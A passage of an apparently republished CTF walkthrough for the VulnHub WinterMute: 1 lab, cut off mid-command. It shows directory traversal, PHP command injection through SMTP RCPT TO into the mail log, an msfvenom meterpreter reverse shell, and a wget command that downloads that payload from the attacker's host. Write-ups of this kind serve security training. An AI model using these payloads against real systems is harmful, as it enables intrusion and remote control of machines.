未加星标

Hack the WinterMute: 1 (CTF Challenge)

字体大小 | |
[系统(linux) 所属分类 系统(linux) | 发布者 店小二05 | 时间 2018 | 作者 红领巾 ] 0人收藏点击收藏

Hello friends! Today we are going to take another CTF challenge known as Wintermute (Part 1) and it is another boot2root challenge provided for practice. So let’s try to break through it. But before please note that you can download it from here https://www.vulnhub.com/entry/wintermute-1,239/

Security Level:Intermediate

Author Note : There are 2 important things to note down for this lab

No buffer overflows or exploit development any necessary password cracking can be done with small wordlists. Straylight simulates a public facing server with 2 NICS. Cap this first, then pivot to the final machine. Neuromancer is within a non-public network with 1 NIC.

Imp Note : This lab has 2 parts. The 1 st part comprises of gaining the root shell of the victim machine and subsequently pivoting to another machine .To begin with , this is the 1 st part of the lab ; post which we will publish the 2 nd lab in upcoming days

Penetrating Methodologies

Network Scanning (Nmap, netdiscover) HTTP service enumeration Directory Traversal in browser using Email log files Exploiting OS command injection in RCPT option of SMTP Generatephp Backdoor (Msfvenom) Execute the backdoor embedded in RCPT option Reverse connection (Metasploit) Import python one-liner for proper TTY shell Identify the appropriate vulnerable SUID Exploiting target (exploit 4115) Get root access and capture the flag

WalkThrough

Let’s start off with scanning the network to find our target.


Hack the WinterMute: 1 (CTF Challenge)

We found our target > 192.168.1.124

Our next step is to scan our target with NMAP.

nmap -p- -A 192.168.1.124
Hack the WinterMute: 1 (CTF Challenge)

The NMAP output shows us that there are 3 ports opened : 25 (SMTP) , 80 (HTTP) , 3000

Browsed the URL http://192.168.1.124 and poked around; however we were not able to get any significant clues to move forward


Hack the WinterMute: 1 (CTF Challenge)

As we are aware that port 3000 is also opened on the victim machine , hence let’s try to access the website on a Non-standard HTTP port (3000) as follows :

Browse to http://192.168.1.124:3000 and we will be greeted with the following page


Hack the WinterMute: 1 (CTF Challenge)

As we can see a Hint at the bottom of the page , the default username and credentials are already provided to us ! Lets try to login to the page with them

Username: admin

Password :admin


Hack the WinterMute: 1 (CTF Challenge)

On clicking the Flows option, we were redirected to the following page:


Hack the WinterMute: 1 (CTF Challenge)

Here we observed few directories were listed (as shown in screenshot above), hence we thought of appending them to our URL http://192.168.1.124/ OR http://192.168.1.124:3000/

We tried accessing http://192.168.1.124:3000/turing-bolo/ however no success . Then we browsed the URL http://192.168.1.124/turing-bolo/ and got below page


Hack the WinterMute: 1 (CTF Challenge)

Click on Submit Query and we are redirected to the following page

http://192.168.1.124/turing-bolo/bolo.php?bolo=case


Hack the WinterMute: 1 (CTF Challenge)

From the above screenshot we can see few log files (as highlighted).Per our experience , this could be an indication of Directory traversal where we can execute writeable files in the browser .Hence let’s try to append ../../../log/mail to the URL in the browser as follows :

http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail


Hack the WinterMute: 1 (CTF Challenge)

Now let’s try to enumerate further and connect to the SMTP (25) port

telnet 192.168.1.124 25

As we can see, we got connected to the victim machine successfully. Now let’s try to send a mail via command line (CLI) of this machine and send the OS commands via “ RCPT TO” option.

MAIL FROM:<rrajchandel@gmail.com> 220 straylight ESMTP Postfix (Debian/GNU) 250 2.1.0 Ok RCPT TO:<?php system('whoami'); ? 501 5.1.3 Bad recipient address syntax
Hack the WinterMute: 1 (CTF Challenge)

Note :We can ignore the 501 5.1.3 Bad recipient address syntax server response as seen in the above screenshot because ideally the internal email program of the server (victim machine), is expecting us to input an email ID and not the OS commands.

Now navigate back to the URL http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail

As depicted in the below screenshot of the browser , we can clearly see that mail logs files are displaying response output (www-data) of the Unix (OS) command whoami


Hack the WinterMute: 1 (CTF Challenge)

Let’s generate a Reverse shell with the following command

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f elf > shell.elf

Now run the web server on the Kali machine

python m SimpleHTTPServer 80
Hack the WinterMute: 1 (CTF Challenge)

As we got success in receiving the response of OS commands in the email log files, in a similar way there is a possibility that following this method ,we may also get the Meterpreter access of the victim machine

Hence as seen in the below screenshot , we will pass the commands in RCPT command as follows :

1.Navigate to /tmp directory and Download the shell.elf file from Kali machine

2.Modify the permissions of the shell.elf file

3.Execute our Reverse shell (shell.elf) file

RCPT TO:<?php system('cd /tmp; wget http://192.168.1.134/shell.elf'); ?> 501 5.1.3 Bad recipient address syntax RCPT TO:<?php system('chmod 777 /tmp/shell.elf'

本文系统(linux)相关术语:linux系统 鸟哥的linux私房菜 linux命令大全 linux操作系统

tags: bolo,shell,machine,http
分页:12
转载请注明
本文标题:Hack the WinterMute: 1 (CTF Challenge)
本站链接:https://www.codesec.net/view/586914.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(linux) | 评论(0) | 阅读(20)